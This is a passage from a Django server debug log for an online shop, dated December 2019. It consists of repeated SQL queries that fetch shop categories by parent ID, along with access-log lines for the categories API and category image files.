"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:25:32,643 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:25:32,647 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:25:32,650 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 21:25:32,654 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:25:32,658 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:25:32,661 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:25:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 21:25:33] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [31/Dec/2019 21:25:33] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [31/Dec/2019 21:25:33] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [31/Dec/2019 21:25:33] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [31/Dec/2019 21:25:33] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [31/Dec/2019 21:25:33] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 DEBUG 2019-12-31 21:25:33,585 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 21:25:33,593 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:25:33,598 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:25:33,600 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:25:33,604 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:25:33,607 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:25:33,611 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:25:33,614 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:25:33,616 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:25:33,620 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:25:33,623 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:25:33,626 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:25:33,629 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:25:33,631 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:25:33,635 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:25:33,639 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:25:33,641 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:25:33,644 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:25:33,647 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:25:33,652 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:25:33,655 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:25:33,658 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 21:25:33,661 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:25:33,663 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:25:33,666 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:25:33,669 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:25:33,673 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:25:33,676 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:25:33,679 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:25:33,681 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:25:33,685 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:25:33,687 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:25:33,690 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:25:33,692 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:25:33,695 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:25:33,700 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:25:33,703 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:25:33,705 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:25:33,708 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:25:33,710 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:25:33,712 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:25:33,715 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:25:33,717 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 21:25:33,720 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:25:33,723 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:25:33,726 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:25:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 21:26:13] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 21:27:34,732 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 21:27:34,738 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:27:34,742 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:27:34,744 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:27:34,748 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:27:34,750 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:27:34,752 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:27:34,754 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:27:34,757 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:27:34,760 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:27:34,762 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:27:34,764 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:27:34,767 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:27:34,769 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", 